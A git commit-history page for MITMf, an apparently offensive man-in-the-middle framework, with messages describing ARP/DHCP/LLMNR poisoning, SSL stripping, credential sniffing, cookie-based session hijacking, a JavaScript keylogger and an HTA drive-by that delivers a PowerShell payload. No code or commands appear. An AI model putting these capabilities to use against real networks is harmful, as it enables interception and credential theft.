Compare commits

...

222 commits

Author SHA1 Message Date
byt3bl33d3r
0458300e58
Update README.md 2018-08-28 23:37:24 +08:00
byt3bl33d3r
ca6ba15ee3
Update README.md 2018-08-28 23:37:00 +08:00
byt3bl33d3r
067cc4e337
Merge pull request #472 from rememberYou/fix/display
Fix indentation for arpmode
2018-05-04 11:19:17 -06:00
byt3bl33d3r
18814dd1a0
Merge pull request #473 from rememberYou/fix/alias-banner
Fix useless banner alias
2018-05-04 11:19:08 -06:00
byt3bl33d3r
0c844045cb
Merge pull request #474 from rememberYou/fix/file-reading
Add refactoring of file reading
2018-05-04 11:18:59 -06:00
Terencio Agozzino
2f802e71c7 Add refactoring of file reading 2018-05-03 20:28:54 +02:00
Terencio Agozzino
ab5a969e23 Fix useless banner alias 2018-05-03 19:56:31 +02:00
Terencio Agozzino
e44551bd54 Fix indentation for arpmode 2018-05-03 19:51:57 +02:00
byt3bl33d3r
906c7951df
Merge pull request #279 from oscar1/master
possible fix issue  #253 and #227
2018-03-27 01:59:47 +08:00
byt3bl33d3r
6407b1df9f
Merge pull request #416 from jlcmoore/master
Https load error, and incorrect variable name
2018-03-27 01:59:35 +08:00
byt3bl33d3r
8588921e09
Merge pull request #450 from sensepost/master
Netcreds update, fixing some versions of the CHALLENGE NOT FOUND bug.
2018-03-27 01:59:18 +08:00
Reino Mostert
9c4313c0eb This commit includes various fixes made to netcreds over the past two years. Most notably, it fixes the issue in which parse_netntlm_chal passes arguments to parse_ntlm_chal in the wrong order, and not parsing HTTP headers correctly in headers_to_dict, thus causing the CHALLENGE NOT FOUND bug. This resolves https://github.com/byt3bl33d3r/MITMf/issues/436. The output format changes in netcreds have been left out of this commit. 2018-02-19 18:01:36 +02:00
byt3bl33d3r
ba0989b677
Update README.md 2017-12-20 17:46:29 -07:00
byt3bl33d3r
da0c7356fe Merge pull request #425 from OmgImAlexis/master
fix header markdown
2017-10-18 10:28:56 -06:00
Alexis Tyler
aa11f2a12b
fix header markdown 2017-10-16 19:57:34 +10:30
Jared Moore
c8db6d3568 Https load error, and incorrect variable name 2017-08-07 09:57:56 -05:00
byt3bl33d3r
d535950994 Merge pull request #397 from Ritiek/master
Fix typo
2017-05-01 09:41:11 -06:00
byt3bl33d3r
5bf3e29e01 Update README.md 2017-04-30 23:56:19 -06:00
Ritiek Malhotra
182b3d704b Fix typo 2017-05-01 07:42:57 +05:30
byt3bl33d3r
13d469d979 Merge pull request #394 from camilleeyries/patch-1
Notice user when not running as root.
2017-04-28 11:47:06 -06:00
Camille Eyriès
acff5e6e44 Notice user when not running as root.
The mocking message that was at this place before was... hurting.
Fixed. ( maybe it's a design principe, I don't know )

Exemple output: ```
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[-] The derp is strong with this one
TIP: you may run MITMf as root.
```
2017-04-28 18:47:26 +02:00
byt3bl33d3r
431e0a78ec Merge pull request #389 from bryant1410/master
Fix broken headings in Markdown files
2017-04-18 20:36:53 -06:00
byt3bl33d3r
b04112ce07 Merge pull request #385 from gigawhitlocks/gigawhitlocks-patch-1
Fix misspelling in README
2017-04-18 20:36:34 -06:00
Santiago Castro
24d8722db3 Fix broken Markdown headings 2017-04-17 05:25:20 -03:00
Ian Whitlock
0684f7c156 Fix misspelling in README 2017-03-31 10:49:40 -05:00
byt3bl33d3r
0e81e40388 Merge pull request #254 from onedv/master
Captive portal redirecting using 302
2016-12-12 23:39:55 -07:00
byt3bl33d3r
40a5527358 Merge pull request #356 from hackereg35/patch-2
Update packetfilter.py
2016-12-12 23:36:32 -07:00
byt3bl33d3r
0c8c555158 Merge pull request #357 from hackereg35/patch-3
Update mitmf.py
2016-12-12 23:36:23 -07:00
byt3bl33d3r
e8dd557592 Merge pull request #346 from ZonkSec/master
spelling correction on "Zapped a strict-trasport-security header"
2016-12-12 23:18:45 -07:00
hackereg35
726c823628 Update mitmf.py
Added multi filter support
2016-11-03 15:55:13 +02:00
hackereg35
37937f74ba Update packetfilter.py
Added multi filter support
2016-11-03 15:49:06 +02:00
ZonkSec
f04ccf9d31 Update ServerConnection.py 2016-10-11 12:17:33 -05:00
ZonkSec
6e9d9ba707 Update ServerConnection.py 2016-10-11 12:16:27 -05:00
byt3bl33d3r
2dc1dd4f12 Hold on to your butts cause here we go.
This should resolve:
* Issue #307
* Issue #309
* Issue #302
* Issue #294

Apperently, Twisted made some fairly heavy API changes in their 16.x
release which kinda fucked all the plugins up.
2016-06-08 23:39:58 -06:00
oscar1
18c8f9119c Merge pull request #1 from oscar1/oscar1-patch-1
Update ARP.py
2016-03-06 15:50:40 +01:00
oscar1
d59b282fb9 Update ARP.py
small change to fix the "half duplex" issue. First; without the fix I don't receive any packets from the remote host to the target. I only received packets from the target to the remote host. Second; the original code wasn't "symmetric". Tested on kali2 with a linksys WRT54GL router on WiFI. Compared the ARP packets to those produced by ettercap, which was working correctly on my system. Including the fix resembles the ettercap method. It also works correctly when the arguments to the Ether() constructor are removed altogether.

Note that the problem occurs when not using any modules at all, only a simple filter and the spoofplugin. The problem may also be routerspecific, I dont know.
2016-03-06 15:48:40 +01:00
byt3bl33d3r
06ef1da084 Merge pull request #259 from HAMIDx9/master
Multiple fixes, netcreds, hsts dns, inject plugin
2016-01-30 11:51:09 -07:00
HAMIDx9
96e0b5f0e0 Fix #230 HSTS bypass DNS problem when timeout occures 2016-01-29 01:43:45 +03:30
HAMIDx9
f8293c38c9 Fix returning data, check mime to avoid heavy chardet process we are not interested in other mimes. 2016-01-29 01:42:54 +03:30
HAMIDx9
2490b87f43 Fix printer format to print logs and avoid netcreds shutting down 2016-01-28 22:03:07 +03:30
Oliver Nettinger
822b87e77c Captive Portal related changes
Made options exclusive
Added OSX files to .gitignore
Update README with plugin
2016-01-19 07:52:23 +01:00
Oliver Nettinger
681be498a9 Added captive portal plugin 2016-01-14 11:11:21 +01:00
byt3bl33d3r
d542dc139f Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-11-03 17:57:47 -07:00
byt3bl33d3r
640f02a8a3 Added imagerandomizer plugin 2015-11-03 17:57:41 -07:00
byt3bl33d3r
5a6e0f6f48 Merge pull request #204 from xmcp/xmcp-patch-1
fixes #201
2015-10-22 12:31:51 -06:00
byt3bl33d3r
d0b4fd66fa Merge pull request #207 from orthographic-pedant/spell_check/arbitrary
Fixed typographical error, changed arbitary to arbitrary in README.
2015-09-30 19:50:14 -05:00
orthographic-pedant
ba280cc64c Fixed typographical error, changed arbitary to arbitrary in README. 2015-09-30 18:51:40 -04:00
xiao-mou
f7396d631d bugfix 2015-09-28 21:22:10 +08:00
byt3bl33d3r
f6ffad2879 Merge pull request #193 from xmcp/xmcp-patch-1
fixes #192
2015-09-14 20:27:21 +02:00
byt3bl33d3r
589e45b64f Fixed IPtables for APF Mode
Added a new banner
2015-09-14 20:25:24 +02:00
xiao-mou
b04d2e0258 bugfix 2015-09-10 17:20:15 +08:00
byt3bl33d3r
16b774248d updated bdfactory to latest commit 2015-09-06 13:52:32 +02:00
byt3bl33d3r
5b7967f02d removed setup.sh 2015-09-06 13:28:24 +02:00
byt3bl33d3r
d1df76c601 fixes #188 2015-09-06 13:14:12 +02:00
byt3bl33d3r
22a43df4f8 DNS server now outputs all queries to seperate log file
Fixed a bug where the SSLStrip proxy wouldn't allow caching if the AppCache poison plugin is enabled
HTTP and SMB servers now listen on all interfaces
2015-09-06 12:47:07 +02:00
byt3bl33d3r
9add87c5b2 Fixed a bug where the DNS server would throw a traceback when multiple named servers are specified 2015-09-06 11:23:45 +02:00
byt3bl33d3r
a0fecd4a38 reverts changes from PR #183, fixes issue #187 2015-09-06 10:51:40 +02:00
byt3bl33d3r
bb3078ca40 added an actual .coveragerc for coverage 2015-09-05 15:41:32 +02:00
byt3bl33d3r
f7da7926df added coveralls support in travis 2015-09-05 15:19:46 +02:00
byt3bl33d3r
2042e8350d Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-09-05 14:57:15 +02:00
byt3bl33d3r
96c83ee565 added coveralls badge to the readme 2015-09-05 14:56:44 +02:00
byt3bl33d3r
c870d80d04 Merge pull request #183 from HAMIDx9/master
Fix improperly use config multiple nameservers
2015-09-05 14:45:33 +02:00
byt3bl33d3r
3fb6f21153 travis now uses notices instead of messages 2015-09-05 14:40:52 +02:00
byt3bl33d3r
333234a445 add skip_join to travis 2015-09-05 14:35:40 +02:00
byt3bl33d3r
c0934e1179 travis is picky 2015-09-05 14:25:33 +02:00
byt3bl33d3r
766e5b7a44 changed default IRC message template 2015-09-05 14:20:12 +02:00
byt3bl33d3r
650525ef12 added IRC notifications for travis 2015-09-05 13:56:01 +02:00
byt3bl33d3r
7512c51af5 updated .travis.yml for faster tests 2015-09-05 13:46:16 +02:00
HAMIDx9
00745afb35 Fix improperly use config multiple nameservers 2015-09-03 11:50:02 +04:30
byt3bl33d3r
df608030f3 fixes #178, we are now manually adding an Ether() layer to ARP packets and sending them at L2 2015-09-02 14:47:25 +02:00
byt3bl33d3r
e54b90aa7b fixes #182, iptables rules weren't being set 2015-09-02 12:02:56 +02:00
byt3bl33d3r
54c27ddade fixed Net-Creds tests 2015-09-01 14:31:12 +02:00
byt3bl33d3r
986b2b851f Fixed bug where Net-Creds wouldn't parse URL's and HTTP data when reading from pcap
Active packet filtering engine and proxy + servers are now mutually exclusive , you can only start one of them (iptable conflicts)
2015-09-01 14:15:21 +02:00
byt3bl33d3r
28fc081068 Merge pull request #169 from HAMIDx9/master
Add unicode support for jskeylogger plugin, fixes #56
2015-08-24 05:35:52 +02:00
HAMIDx9
752fafaf4b Add unicode support for jskeylogger plugin, fixes #56 2015-08-24 04:52:33 +04:30
byt3bl33d3r
05588febef not worth testing utils.py, removed from tests 2015-08-23 22:11:10 +02:00
byt3bl33d3r
ac762ad810 now this should work 2015-08-23 22:05:10 +02:00
byt3bl33d3r
6bde387356 changed interface in tests 2015-08-23 21:59:42 +02:00
byt3bl33d3r
9d774a28b9 travis is trolling me again 2015-08-23 21:51:32 +02:00
byt3bl33d3r
c0aa986b77 travis is trolling me 2015-08-23 21:45:04 +02:00
byt3bl33d3r
1a14f85ed3 added moar tests! 2015-08-23 21:37:40 +02:00
byt3bl33d3r
bef63eda9f now using nosetests 2015-08-23 21:08:33 +02:00
byt3bl33d3r
a3bbc797ac removed system_site from travis 2015-08-23 21:03:05 +02:00
byt3bl33d3r
db5b65c463 trying some new tests out 2015-08-23 20:11:27 +02:00
byt3bl33d3r
27c28e512e Inject.py now tries to detect encoding before parsing HTML with BeautifulSoup 2015-08-23 19:42:52 +02:00
byt3bl33d3r
fb41a510f6 Merge branch 'master' of https://github.com/HAMIDx9/MITMf into HAMIDx9-master 2015-08-23 18:48:22 +02:00
byt3bl33d3r
cbcf44b360 added lxml to requirements.txt 2015-08-23 18:48:19 +02:00
HAMIDx9
7a5186750f Fix encoding in Inject plugin by using manual encoding detection, BS fails in some cases 2015-08-23 20:57:18 +04:30
byt3bl33d3r
24070afbd0 Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine
removed check to enable IP forwarding using sysctl
2015-08-23 01:33:16 +02:00
byt3bl33d3r
77fc00539e Merge branch 'master' into watchdog_removal 2015-08-23 01:28:14 +02:00
byt3bl33d3r
28cf6bb687 Update README.md 2015-08-23 01:25:40 +02:00
byt3bl33d3r
69630e7a51 Merge branch 'master' into watchdog_removal 2015-08-22 22:24:12 +02:00
byt3bl33d3r
69f3e65ea9 Update CONTRIBUTING.md 2015-08-22 22:19:10 +02:00
byt3bl33d3r
09402ecccf Update README.md 2015-08-22 22:08:10 +02:00
byt3bl33d3r
20ae6b204b added system_site_packages in travis.yml 2015-08-22 17:07:20 +02:00
byt3bl33d3r
885ecc3a4e replaced watchdog with pyinotify 2015-08-22 16:51:50 +02:00
byt3bl33d3r
d535c8796c fixes #158 2015-08-12 17:51:55 +02:00
byt3bl33d3r
1a5c7c03b7 Updated Filepwn plugin to the latest BDFactory & BDFProxy version 2015-08-12 16:30:34 +02:00
byt3bl33d3r
1a50f000c1 added an option to parse creds from a pcap using NetCreds, removed mitmflib as a dep (was causing problems for travis) 2015-08-11 17:11:44 +02:00
byt3bl33d3r
0a00f671b8 removed capstone dep in .travis.yml 2015-08-11 16:31:28 +02:00
byt3bl33d3r
56cb34568d added caspstone to build deps, added msg param in basic_tests.py 2015-08-11 16:25:00 +02:00
byt3bl33d3r
a44cf5cd29 doing some testing with tests 2015-08-11 16:10:12 +02:00
byt3bl33d3r
3d9e2ac453 re-added sudo to travis.yml (I have no idea what I'm doing) 2015-08-11 16:01:59 +02:00
byt3bl33d3r
1dd8feeea0 got rid of sudo in tests 2015-08-11 15:53:31 +02:00
byt3bl33d3r
7f691244e7 added basic test 2015-08-11 15:48:40 +02:00
byt3bl33d3r
81c3400383 added .travis.yml 2015-08-11 15:25:24 +02:00
byt3bl33d3r
89a1f9f9af added travis-ci badge 2015-08-05 15:10:15 +02:00
byt3bl33d3r
e22276477b fixes #150
Forgot to start up the Browser server.. oops!
2015-08-05 14:32:22 +02:00
byt3bl33d3r
772ef9ab39 responder code is now up to date with the lastest version
logging is going to have to get cleaned up, but that's a minor issue
re-implemented the function to add endpoints to the http server
added an option to manually specify the gateways mac in the Spoofer plugin
2015-08-05 13:31:04 +02:00
byt3bl33d3r
c527dc1d21 debug logs now show command string used on startup 2015-08-03 05:46:00 +02:00
byt3bl33d3r
0aba2ad62c Merge branch 'responder-refactor' of github.com:byt3bl33d3r/MITMf into responder-refactor 2015-08-03 05:38:44 +02:00
byt3bl33d3r
052c86b242 fixes #146 2015-08-03 05:38:02 +02:00
byt3bl33d3r
159d3adf7a fixes 146 2015-08-03 05:37:23 +02:00
byt3bl33d3r
fa59ca466b third pass:
- All servers back online
- modified logging
2015-08-03 05:34:46 +02:00
byt3bl33d3r
46356b2ad5 Merge branch 'master' of github.com:byt3bl33d3r/MITMf into responder-refactor 2015-08-02 22:53:28 +02:00
byt3bl33d3r
8b55a2e3f5 Second pass:
MDNS, LLMNR and NBTNS poisoners are back online
HTTP server now functional
2015-08-02 22:53:16 +02:00
byt3bl33d3r
703c9045ed Fixes #144 2015-08-02 21:23:35 +02:00
byt3bl33d3r
fd9b79c617 first pass at refactoring:
directory structure has been simplified by grouping all the poisoners and servers in one folder
impacket smb server has been replaced with responder's
flask http server has beem replaced with responder's
modified config file to support new changes
2015-08-02 21:15:10 +02:00
byt3bl33d3r
93d21c8b27 Fixed bug when logging in Netcreds
FIxed an invalid function call in MDNSpoisoner.py
2015-08-01 11:12:53 +02:00
byt3bl33d3r
8270f337ad DHCP poisoner now takes into account the requested IP of clients WPAD server address
Specifying interface is now optional
2015-07-30 16:56:11 +02:00
byt3bl33d3r
87bca5e7dd Added new beefapi.py , modified beefautorun plugin: now handles hook injection + ARE autoloading 2015-07-30 00:54:59 +02:00
byt3bl33d3r
232e43325d modified intall intructions 2015-07-28 19:45:12 +02:00
byt3bl33d3r
e9657c0e07 updated lock icon 2015-07-28 11:46:52 +02:00
byt3bl33d3r
795b98d1c5 changed examples 2015-07-28 06:01:21 +02:00
byt3bl33d3r
39aa7473ad updated filter explanation 2015-07-28 05:47:12 +02:00
byt3bl33d3r
68e98704e2 indent and highlighting 2015-07-28 05:11:15 +02:00
byt3bl33d3r
307303ea58 added packet filter tutorial to README 2015-07-28 05:06:42 +02:00
byt3bl33d3r
a831236538 moved the FAQ to CONTRIBUTING.md 2015-07-28 04:40:40 +02:00
byt3bl33d3r
0046c96806 spelling 2015-07-28 02:27:54 +02:00
byt3bl33d3r
a024987c91 Update README.md 2015-07-28 02:19:11 +02:00
byt3bl33d3r
39e0ae0e88 added features and examples in readme 2015-07-28 04:10:32 +02:00
byt3bl33d3r
720c86470a added code climate, modified readme 2015-07-27 21:54:45 +02:00
byt3bl33d3r
7ec9f7b395 This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality)
by using netfilterqueue, you can pass a filter using the new -F option, (will be adding an example later)
additionaly removed some deprecated attributes and the --manual-iptables option
2015-07-27 20:44:23 +02:00
byt3bl33d3r
0add358a57 Update README.md 2015-07-26 13:34:37 +02:00
byt3bl33d3r
42499a9e32 Added description to the README 2015-07-26 15:12:24 +02:00
byt3bl33d3r
85a9a95f2d Added Responder to CONTRIBUTORS 2015-07-26 14:17:21 +02:00
byt3bl33d3r
719779542c added latest version tag in README 2015-07-26 14:07:30 +02:00
byt3bl33d3r
f0fce41c88 App-Cache poison and BrowserSniper plugins have been refactored, added supported python version tags in README 2015-07-26 14:03:56 +02:00
byt3bl33d3r
52a493995a added more to CONTRIBUTORS.md 2015-07-25 03:40:20 +02:00
byt3bl33d3r
f4df9971f9 added CHANGELOG.md, CONTRIBUTORS.md and modded README.md 2015-07-25 03:37:45 +02:00
byt3bl33d3r
41d9e42ca9 added CHANGELOG.md, CONTRIBUTORS.md and modded README.md 2015-07-25 03:29:33 +02:00
byt3bl33d3r
ba14ed8687 This commit refactors ARP and DHCP poisoning:
DHCP poisoning now works on Windows, additionaly it's been optimized for performance improvements
ARP poisoning has been optimized with and internal cache and some algo improvements

cve-details-parser.py has been added to the utils/ directory to help adding exploits to the BrowserSniper config file

I'm currently working on adding to the filepwn plugin all of the missing options that bdfproxy stand-alone has
2015-07-25 02:49:41 +02:00
byt3bl33d3r
5e2f30fb89 This is a vewwwy big commit
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes
- The logging of the whole framework has been compleatly overhauled
- plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying!
- New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload
- the API of the plugins has been simplified
- Improvements and error handling to user-agent parsing
- Some misc bugfixes
2015-07-18 20:14:07 +02:00
byt3bl33d3r
ff0ada2a39 Revamped logging , plugins will be re-added later once refactored 2015-07-14 17:40:19 +02:00
byt3bl33d3r
fb0e8a3762 fixed #126 2015-06-20 14:16:29 +02:00
byt3bl33d3r
8f27b76ac6 Merged changes from upstream 2015-06-19 12:13:32 +02:00
byt3bl33d3r
7e35d26514 should fix bug number 2 of issue #122 2015-06-19 12:13:18 +02:00
byt3bl33d3r
254d0ab713 Update README.md 2015-06-18 08:53:36 +02:00
byt3bl33d3r
f99080fc4c fixed error in Exception handling in SMBserver.py 2015-06-15 01:04:47 +02:00
byt3bl33d3r
2cde231b55 fixed conflict 2015-06-15 00:28:36 +02:00
byt3bl33d3r
951937bac4 commented out unfinished option in Inject.py 2015-06-15 00:27:09 +02:00
byt3bl33d3r
e25edc21c6 updated readme.md again 2015-06-15 00:21:51 +02:00
byt3bl33d3r
bb8ee46b82 added kali setup script and updated readme 2015-06-15 00:18:55 +02:00
byt3bl33d3r
7fc75d7bf8 changed ServerConnection.py back over to user_agents! 2015-06-12 01:36:12 +02:00
byt3bl33d3r
882e3b6d07 Update requirements.txt 2015-06-12 00:07:50 +02:00
byt3bl33d3r
b73ac99de3 re-added scapy, changed imports 2015-06-11 22:27:31 +02:00
byt3bl33d3r
aa246130e2 updated requirements.txt, changed imports to mitmflib 2015-06-11 22:05:22 +02:00
byt3bl33d3r
5b969e09fb added error handling into ARPWatch, removed a useless (i think) lib from requirements.txt 2015-06-10 19:42:23 +02:00
byt3bl33d3r
e3aa8ba617 fixes #117 2015-06-08 13:38:45 +02:00
byt3bl33d3r
2f9b8ff77a Merged branch webserver into master, the actual built-in webserver isn't ready yet
but the changes to the SMB server are, we can now define shares in the config and start the SMB server in Karma mode! \o/
2015-06-08 04:35:18 +02:00
byt3bl33d3r
96d1078d42 Merge branch 'webserver' 2015-06-08 04:30:11 +02:00
byt3bl33d3r
316246e3cc Re-Wrote Beef-api, refactored the beefAutorun plugin as per #113, this also should address any problems left over from #106 2015-06-08 04:13:55 +02:00
byt3bl33d3r
7110238fb2 This adds in error handling to avoid the 'Interrupted system call' error described in #109
*Note: this doesn't actually fix the problem
2015-06-06 19:26:23 +02:00
byt3bl33d3r
d56ce5447e This commit should resolve issues #106 and #109
Issue #106 was caused by a 'None' value being returned when BeEF was unable to detect the hooked browser's OS

Issue #109 was probably caused by locked resources when send() and sendp() where being called, adding in sleep() seems to have resolved the issue (at least on my machine)
2015-06-06 14:20:54 +02:00
byt3bl33d3r
ffdb4ff55c fixed DHCP and ICMP spoofing calling wrong vars 2015-06-05 21:06:20 +02:00
byt3bl33d3r
b0fa2e010d fixed #108 2015-06-03 01:44:12 +02:00
byt3bl33d3r
b6b40aba2c Resolved Readme.md conflicts 2015-06-02 23:56:02 +02:00
byt3bl33d3r
c2354b9b63 Merged the SMBTrap plugin to master and relative code changes 2015-06-02 23:54:33 +02:00
byt3bl33d3r
4de7d3e67e fixed a wrong var 2015-06-02 18:53:30 +02:00
byt3bl33d3r
e1bf7c642a Merge pull request #104 from DrDinosaur/patch-1
Cleaned up readme
2015-06-01 00:56:54 +02:00
Dillon Korman
61d602c5f0 Cleaned up readme
Various improvements with grammar and style.
2015-05-31 12:11:12 -10:00
byt3bl33d3r
14580f1589 second implementation of the HTTP server, you can now define shares for the SMB server in the config file, added an option to switch between the normal SMB server and the Karma version.
removed some useless code (left over from the responder plugin), serverResponseStatus hook now returns a dict (tuple was causing errors)
2015-05-30 15:00:41 +02:00
byt3bl33d3r
87cb98b6ac fixes 98 2015-05-28 13:49:40 +02:00
byt3bl33d3r
f86457b300 fixes #96 2015-05-27 22:02:41 +02:00
byt3bl33d3r
e985d42a8a The new changes caused an exception when unpacking the tuple, fixed it 2015-05-23 00:37:08 +02:00
byt3bl33d3r
840e202e5b handleStatus() is now hooked through serverResponseStatus, were now able to modify the server response code and message
added the SMBTrap plugin
2015-05-22 20:16:47 +02:00
byt3bl33d3r
e913e6ae75 Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-05-20 14:35:31 +02:00
byt3bl33d3r
8b915064c1 fixed wrong var name in beefautorun 2015-05-20 14:35:03 +02:00
byt3bl33d3r
bdcee18be0 Merge branch 'master' of github.com:byt3bl33d3r/MITMf into webserver 2015-05-19 22:45:27 +02:00
byt3bl33d3r
929520fcc8 Initial webserver implementation, plus organized directory structure a bit better 2015-05-19 22:43:43 +02:00
byt3bl33d3r
a102975492 Update README.md 2015-05-19 22:32:39 +02:00
byt3bl33d3r
fb26d89204 typos 2015-05-19 12:58:58 +02:00
byt3bl33d3r
3814b4cf82 fixed .gitignore 2015-05-19 00:45:27 +02:00
byt3bl33d3r
ae236625db readme 2015-05-19 00:23:03 +02:00
byt3bl33d3r
2249410c9f Merge branch 'master' of github.com:byt3bl33d3r/MITMf
fixed readme conflict
2015-05-19 00:16:09 +02:00
byt3bl33d3r
cd844fcd48 Merge branch 'dynamic_config' 2015-05-19 00:13:27 +02:00
byt3bl33d3r
946ba0b365 updated readme 2015-05-19 00:08:44 +02:00
byt3bl33d3r
563a8d37c1 Fixed a bug in SSLstrip+ code, when redirecting to certain sites
Created a wrapper class around Msfrpc to limit code re-use when interacting with msf
2015-05-19 00:00:40 +02:00
byt3bl33d3r
b9371f7cdc Screenshotter plugin now live!
Added an interval option to specify the interval at which to take the sceenshots

Ferret-NG plugin is pretty much set also, was a bit of a dummy and didn't take into account that we would have sessions from multiple clients (duh!) , so I added a section in the config file to specify the client to hijack the sessions from , also added an option to load the cookies from a log file!
2015-05-16 21:22:11 +02:00
byt3bl33d3r
ff39a302f9 This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)
JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completly re-written along with it's config file section
Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very wierd one) , but other than that it works (did i mention i hate js?)
Jskeylogger's javscript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS?
Plugins that deal with javascript now read it from a file as supposed to having it built in (encoding issues) fu javascript
User agent parsing is now built in and handled by core/httpagentparser.py, this because the user-agent library is a pain to install on some distros , also removes 3-4 deps which is a plus

also fuck javascript
2015-05-16 00:43:56 +02:00
byt3bl33d3r
86870b8b72 markdown 2015-05-11 04:26:37 +02:00
byt3bl33d3r
acf8a78545 Readme tidying 2015-05-11 04:16:52 +02:00
byt3bl33d3r
de1cf6f9d6 typos 2015-05-11 04:03:12 +02:00
byt3bl33d3r
aefd0cea3b Updated Readme 2015-05-11 03:58:52 +02:00
byt3bl33d3r
79025dc77e Initial working PoC for the Ferret-NG plugin that will replace the SessionHijacker plugin: it will capture cookies and trasparently feed them to the proxy it starts up on port 10010 (by default), this way we just have to connect to the proxy, browse to the same website as the victim and we will automatically hijack their session! \o/
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed.

Replace plugin has been given it's own section in the config file

currently the BeedAutorun and Javapwn plugins have to be cleaned up...

BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version

Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits

Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin

Tweaked the output of some plugins
2015-05-11 03:13:45 +02:00
byt3bl33d3r
d3e509d4cd Added error handling to DNS and SMB servers when port is in use
Added check to see if a plugins options were called without loading the actual plugin
2015-05-06 23:07:59 +02:00
byt3bl33d3r
70ec5a2bbc All plugins are now modified to support dynamic config file changes
Responder functionality fully restored
2015-05-05 19:04:01 +02:00
byt3bl33d3r
dfa9c9d65e Added debug logging to ProxyPlugins, it will now print a traceback if errors occur in hooked functions 2015-05-05 00:39:59 +02:00
byt3bl33d3r
5d07551a50 WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it)
the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them.
Modified and re-added the JS-keylogger and SMBauth plugins
2015-05-04 23:13:21 +02:00
byt3bl33d3r
aa4e022ab0 Kerberos sever back online, squashed some bugs 2015-04-30 00:10:55 +02:00
byt3bl33d3r
6b421d1cac typo 2015-04-28 13:10:36 +02:00
byt3bl33d3r
2c6e9a31b7 modded readme 2015-04-28 13:08:56 +02:00
byt3bl33d3r
08b9029a96 Responder's MDNS/LLMNR/NBTNS poisoners are back in action (better than ever), only WPAD remains.
Tested against Windows 7 and 8, got hashes 100% of the time! \o/

The rest of the servers will be added in after WPAD is fixed.

Next step is to fix the logging... frankly i rather just log everything into the main mitmf.log folder since it's very grep'able.
Also the exact output is going to need tweaking, the lines are wayy to long
2015-04-28 02:03:12 +02:00
byt3bl33d3r
7aad9879d1 version bump in readme 2015-04-27 19:19:34 +02:00
byt3bl33d3r
9712eed4a3 This is 1/2 of the work done... lot's of cool stuff!
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds.

- Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all.
- Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code)
- The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2)
- An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons:
  1) Impacket is moving towards SMB2 support and is actively developed
  2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file)
  3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out)

- Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!)
- Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable.
- POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use)
- Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out)
- Some plugins are missing because I'm currently re-writing them, will be added later
- Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
2015-04-27 18:33:55 +02:00
byt3bl33d3r
71ea8e6046 Update README.md 2015-04-21 17:39:27 +02:00
byt3bl33d3r
42892bbfc5 Merge pull request #67 from secretsquirrel/patch-1
Just a Typo Update
2015-04-20 09:42:08 +02:00
secret squirrel
fddfe7c306 Just a Typo Update 2015-04-19 23:38:13 -04:00
byt3bl33d3r
f2466c822a fixed typo as noticed in #66 2015-04-19 23:37:01 +02:00
byt3bl33d3r
663f38e732 initial dynamic config support
added configwatcher.py
2015-04-19 23:33:44 +02:00
byt3bl33d3r
96eb4e2fa6 added capstone in requirements.txt
modified setup and update scripts
2015-04-18 15:08:11 +02:00
byt3bl33d3r
a766c685b1 also added pyopenssl and service_identity to requirements.txt 2015-04-18 14:31:38 +02:00
byt3bl33d3r
eebd7e1978 added ipy to requirements.txt as noticed in #65 2015-04-18 14:13:58 +02:00
byt3bl33d3r
33c9eda05b fixed the responder plugin (im a dummy) 2015-04-17 02:11:00 +02:00
byt3bl33d3r
88a4e15900 fixed some output 2015-04-16 01:38:28 +02:00
byt3bl33d3r
6121c67eaa Merge branch 'dev' 2015-04-15 18:25:59 +02:00
byt3bl33d3r
b91bb4271b - Fixed bug where sometimes DNS wouldn't resolve local IP's
- Added Metasploit integration to Filepwn plugin
2015-04-15 18:19:19 +02:00
